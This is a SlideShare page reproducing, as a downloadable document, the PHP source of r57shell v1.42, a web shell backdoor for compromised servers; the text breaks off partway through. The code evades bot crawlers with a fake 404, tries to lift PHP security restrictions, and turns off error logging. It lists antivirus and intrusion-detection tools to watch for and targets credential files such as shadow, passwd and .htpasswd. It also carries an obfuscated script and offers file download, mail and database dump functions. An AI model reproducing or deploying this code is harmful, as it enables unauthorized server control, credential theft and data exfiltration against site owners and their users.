SlideShare una empresa de Scribd logo

PHP_SHELL_OPTIMIZED

A
ady36

The PHP code is for a shell called r57shell. It checks for bots, sets variables and configuration options, defines arrays of useful/dangerous commands and files, handles authentication, and generates the HTML interface for the shell.

EducaciónTecnologíaDiseño
1 de 154
Descargar para leer sin conexión
<?php if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");} $language='eng'; $auth = 0; $name=''; $pass=''; //ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8 @setlocale(LC_ALL,'ru_RU.cp1251'); @ini_restore("safe_mode"); @ini_restore("open_basedir"); @ini_restore("safe_mode_include_dir"); @ini_restore("safe_mode_exec_dir"); @ini_restore("disable_functions"); @ini_restore("allow_url_fopen"); if(@function_exists('ini_set')) { @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
@ini_set('allow_url_fopen',1); } else { @ini_alter('error_log',NULL); @ini_alter('log_errors',0); @ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1); } error_reporting(E_ALL); /* ??? ????? */ $userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl'); $danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja'); $tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/'); $downloaders = array('wget','fetch','lynx','links','curl','get'); /* ??? ?????? ???????? ???? ????? realpath() */ //$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; //$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz"; //$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ"; //$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz"; //$chars_rlph = "_-.01234567890"; $chars_rlph = "abcdefghijklnmopqrstuvwxyz"; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php' ,'config.inc.php', 'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin', 'security','php.ini','cdrom','root', 'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf ','accounting.log','home','htdocs', 'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi- bin','html','robots.txt','billing'); /************************************************************************************************ ******/ define("starttime",@getmicrotime()); if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;}; set_magic_quotes_runtime(0); @set_time_limit(0); if(@function_exists('ini_set')) { @ini_set('max_execution_time',0); @ini_set('output_buffering',0); } else { @ini_alter('max_execution_time',0); @ini_alter('output_buffering',0); } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
$safe_mode = @ini_get('safe_mode'); #if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;}; $version = '1.42'; if(@version_compare(@phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="HELLO!"'); header('HTTP/1.0 401 Unauthorized'); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
exit("<h1>Access Denied</h1>"); } } if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) { $tempdir='./'; $select_tempdir = '<select name=tempdir><option value="./">./</option>'; foreach( $tempdirs as $item) { if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;} } $select_tempdir .= '</select>'; setcookie('tempdir',$tempdir); setcookie('select_tempdir',$select_tempdir); }else{ if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];} $select_tempdir = $_COOKIE['select_tempdir']; } $head = ' <html> <head> <title>r57shell v.1.42 - Edited By KingDefacer</title> <script type="text/javascript" language="javascript"> <!-- ML=":<=t/ilcha9 neprsf.wj>o"; MI="1@7?5>3;@?72833>044CCCB7::@8=66B5<AF49BD@E14@7?5>3E"; OT=""; for(j=0;j<MI.length;j++){ OT+=ML.charAt(MI.charCodeAt(j)-48); }document.write(OT); // --></script> file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <STYLE> tr { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #eeeeee 1px solid; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; color: #000000; } td { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #eeeeee 1px solid; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; color: #000000; } .table1 { BORDER: 0px; BACKGROUND-COLOR: #D4D0C8; color: #000000; } .td1 { BORDER: 0px; font: 7pt Verdana; color: #000000; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
.tr1 { BORDER: 0px; color: #000000; } table { BORDER: #eeeeee 1px outset; BACKGROUND-COLOR: #D4D0C8; color: #000000; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; color: #000000; } select { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; color: #000000;; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: #e4e0d8; width: 30%; color: #000000; } textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; color: #000000; } BODY { margin: 1px; color: #000000; background-color: #e4e0d8; } A:link {COLOR:red; TEXT-DECORATION: none} A:visited { COLOR:red; TEXT-DECORATION: none} A:active {COLOR:red; TEXT-DECORATION: none} A:hover {color:blue;TEXT-DECORATION: none} </STYLE> <script language='javascript'> function hide_div(id) file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
{ document.getElementById(id).style.display = 'none'; document.cookie=id+'=0;'; } function show_div(id) { document.getElementById(id).style.display = 'block'; document.cookie=id+'=1;'; } function change_divst(id) { if (document.getElementById(id).style.display == 'none') show_div(id); else hide_div(id); } </script>'; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = 'x' . $dtime[6] . $dtime[7] . 'x' . $dtime[4] . $dtime[5] . 'x' . $dtime[2] . $dtime[3] . 'x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "x50x4bx03x04"; $fr .= "x14x00"; $fr .= "x00x00"; $fr .= "x08x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
$zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "x50x4bx01x02"; $cdrec .= "x00x00"; $cdrec .= "x14x00"; $cdrec .= "x00x00"; $cdrec .= "x08x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
$this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "x00x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
$mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function moreread($temp){ global $lang,$language; $str=''; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@f unction_exists('fclose') && ($ffile = @fopen($temp, "r"))){ if($ffile){ while(!@feof($ffile)){$str .= @fgets($ffile);}; fclose($ffile); } }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesi ze')&&($ffile = @fopen($temp, "r"))){ if($ffile){ $str = @fread($ffile, @filesize($temp)); @fclose($ffile); } }elseif(@function_exists('file')&&($ffiles = @file($temp))){ foreach ($ffiles as $ffile) { $str .= $ffile; } }elseif(@function_exists('file_get_contents')){ $str = @file_get_contents($temp); }elseif(@function_exists('readfile')){ $str = @readfile($temp); }elseif(@function_exists('highlight_file')){ $str = @highlight_file($temp); }elseif(@function_exists('show_source')){ $str = @show_source($temp); }else{echo $lang[$language.'_text56'];} return $str; } function readzlib($filename,$temp=''){ file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
global $lang,$language; $str=''; if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");}; if(@copy("compress.zlib://".$filename, $temp)) { $str = moreread($temp); } else echo $lang[$language.'_text119']; @unlink($temp); return $str; } function morewrite($temp,$str='') { global $lang,$language; if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fwrite($ffile,$str); @fclose($ffile); } }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fputs($ffile,$str); @fclose($ffile); } }elseif(@function_exists('file_put_contents')){ @file_put_contents($temp,$str); }else return 0; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
return 1; } function mailattach($to,$from,$subj,$attach) { $headers = "From: $fromrn"; $headers .= "MIME-Version: 1.0rn"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name="".$attach['name'].""rn"; $headers .= "Content-Transfer-Encoding: base64rnrn"; $headers .= chunk_split(base64_encode($attach['content']))."rn"; if(mail($to,$subj,"",$headers)) { return 1; } return 0; } class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) { $this->port = '3306'; } if(!@function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'MSSQL': if(empty($this->port)) { $this->port = '1433'; } if(!@function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; break; case 'PostgreSQL': if(empty($this->port)) { $this->port = '5432'; } $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!@function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
case 'Oracle': if(!@function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; case 'MySQLi': if(empty($this->port)) { $this->port = '3306'; } if(!@function_exists('mysqli_connect')) return 0; $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port); if(is_resource($this->connection)) return 1; break; case 'mSQL': if(!@function_exists('msql_connect')) return 0; $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'SQLite': if(!@function_exists('sqlite_open')) return 0; $this->connection = @sqlite_open($this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() { file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; case 'MySQLi': return 1; break; case 'mSQL': if(@msql_select_db($this->base,$this->connection)) return 1; break; case 'SQLite': return 1; break; } return 0; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
function query($query) { $this->res=$this->error=''; switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error'; return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error'; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error['message']; } break; case 'MySQLi': if(false===($this->res=@mysqli_query($this->connection,$query))) { $this->error = @mysqli_error($this->connection); return 0; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
else if(is_resource($this->res)) { return 1; } return 2; break; case 'mSQL': if(false===($this->res=@msql_query($query,$this->connection))) { $this->error = @msql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'SQLite': if(false===($this->res=@sqlite_query($this->connection,$query))) { $this->error = @sqlite_error_string($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; } return 0; } function get_result() { $this->rows=array(); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
$this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MySQLi': $this->num_rows=@mysqli_num_rows($this->res); $this->num_fields=@mysqli_num_fields($this->res); while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res))); @mysqli_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'mSQL': $this->num_rows=@msql_num_rows($this->res); $this->num_fields=@msql_num_fields($this->res); while(false !== ($this->rows[] = @msql_fetch_array($this->res))); @msql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'SQLite': $this->num_rows=@sqlite_num_rows($this->res); $this->num_fields=@sqlite_num_fields($this->res); while(false !== ($this->rows[] = @sqlite_fetch_array($this->res))); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table']; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this- >rows[$i]).'');'; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this- >rows[$i]).'');'; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this- >rows[$i]).'');'; } break; case 'MySQLi': $this->dump[0] = '## MySQLi dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this- >rows[$i]).'');'; } break; case 'mSQL': $this->dump[0] = '## mSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this- >rows[$i]).'');'; } break; case 'SQLite': $this->dump[0] = '## SQLite dump'; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this- >rows[$i]).'');'; } break; default: return 0; break; } return 1; } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
break; case 'Oracle': @oci_close($this->connection); break; case 'MySQLi': @mysqli_close($this->connection); break; case 'mSQL': @msql_close($this->connection); break; case 'SQLite': @sqlite_close($this->connection); break; } } function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
break; case 'Oracle': return @ocirowcount($this->res); break; case 'MySQLi': return @mysqli_affected_rows($this->res); break; case 'mSQL': return @msql_affected_rows($this->res); break; case 'SQLite': return @sqlite_changes($this->res); break; default: return 0; break; } } } if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if($file=moreread($_POST['d_name'])){ $filedump = $file; } else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; } if(!empty($_POST['cmd'])) { @ob_clean(); $filename = @basename($_POST['d_name']); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
$content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename="".$filename."";"); echo $filedump; exit(); } } if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); } if (isset($_POST['cmd']) && $_POST['cmd']=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
color=red><b>Can't select database</b></font></div>"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query)) { case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql- >error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result()) { echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana 